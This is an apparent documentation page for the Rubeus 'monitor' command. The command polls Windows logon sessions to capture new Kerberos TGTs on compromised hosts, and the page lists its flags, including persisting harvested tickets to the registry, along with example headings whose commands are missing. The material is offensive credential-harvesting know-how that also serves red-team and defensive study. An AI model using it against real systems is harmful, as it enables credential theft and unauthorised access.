Documentation Index
Fetch the complete documentation index at: https://mintlify.com/ghostpack/rubeus/llms.txt
Use this file to discover all available pages before exploring further.
monitor runs a continuous polling loop that calls LsaEnumerateLogonSessions every /monitorinterval seconds and compares the current TGT set against the previous snapshot. Whenever a new TGT appears — because a user logs in, a service account authenticates, or a scheduled task runs — Rubeus immediately prints the base64-encoded ticket to the console. This makes it invaluable on compromised systems where you want to capture credentials as they flow through, without having to repeatedly run dump by hand. The loop runs indefinitely until interrupted unless /runfor is specified. Requires an elevated process to see sessions belonging to other users.
Flags
How often (in seconds) to poll the logon session cache for new TGTs. Defaults to
60 seconds. The flag /interval is also accepted and behaves identically.Only report new TGTs belonging to the specified username. The flag
/targetuser is also accepted and behaves identically. When omitted, all new TGTs are reported.Print base64 ticket blobs without line wrapping, one blob per line. Makes output easier to process programmatically. No value required.
Persist captured TGTs to the registry under
HKLM\SOFTWARE\<SOFTWARENAME> as each one is seen. Useful for surviving operator disconnects — the tickets can be retrieved later even after the monitoring process exits.Stop monitoring after this many seconds. When omitted the loop runs indefinitely until the process is killed.
Examples
Monitor with the default 60-second interval
Start watching for new TGTs on all sessions (requires elevation):Monitor with a 30-second polling interval
Reduce the interval for a more responsive capture window:Monitor for a specific target user
Only display tickets for a named account — useful when waiting for a specific service account to authenticate:Run for a limited time and exit
Capture for 10 minutes then stop automatically:When
/registry:SOFTWARENAME is supplied, Rubeus writes each captured TGT blob to HKLM\SOFTWARE\<SOFTWARENAME> as it arrives. This key persists across operator sessions and can be read back later with standard registry tools, making it a lightweight persistence mechanism for harvested tickets.